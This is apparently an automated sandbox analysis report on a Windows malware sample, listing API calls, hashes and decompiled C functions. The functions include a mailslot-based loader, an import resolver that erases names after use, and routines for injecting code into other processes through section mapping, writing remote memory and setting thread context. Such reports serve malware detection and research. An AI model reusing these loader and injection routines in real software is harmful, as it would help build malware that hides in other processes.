Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
